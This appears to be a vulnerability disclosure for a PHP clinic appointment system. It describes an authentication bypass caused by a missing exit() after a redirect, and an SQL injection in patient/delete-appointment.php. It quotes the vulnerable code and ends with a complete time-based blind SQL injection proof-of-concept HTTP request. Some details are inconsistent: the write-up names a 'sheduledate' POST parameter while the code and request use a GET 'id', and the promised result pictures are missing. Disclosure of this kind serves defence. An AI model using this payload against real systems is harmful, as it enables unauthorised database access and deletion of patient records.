Found a vulnerability

[0clickjacking0]

Vulnerability file address

patient/delete-appointment.php from line 3,the problem is at line 11 header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
  session_start();

if(isset($_SESSION["user"])){
  if(($_SESSION["user"])=="" or $_SESSION['usertype']!='a'){
    header("location: ../login.php");
  }

}else{
  header("location: ../login.php");
}
......
......
......

patient/delete-appointment.php from line 15,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 21 $sql= $database->query("delete from appointment where appoid='$id';"); causes sql injection

if($_GET){
  //import database
  include("../connection.php");
  $id=$_GET["id"];
  //$result001= $database->query("select * from schedule where scheduleid=$id;");
  //$email=($result001->fetch_assoc())["docemail"];
  $sql= $database->query("delete from appointment where appoid='$id';");
  //$sql= $database->query("delete from doctor where docemail='$email';");
  //print_r($email);
  header("location: appointment.php");
}

POC

GET /patient/delete-appointment.php?id=777'+(SELECT 0x5371724d WHERE 2432=2432 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))WZWf))+ HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

Attack results pictures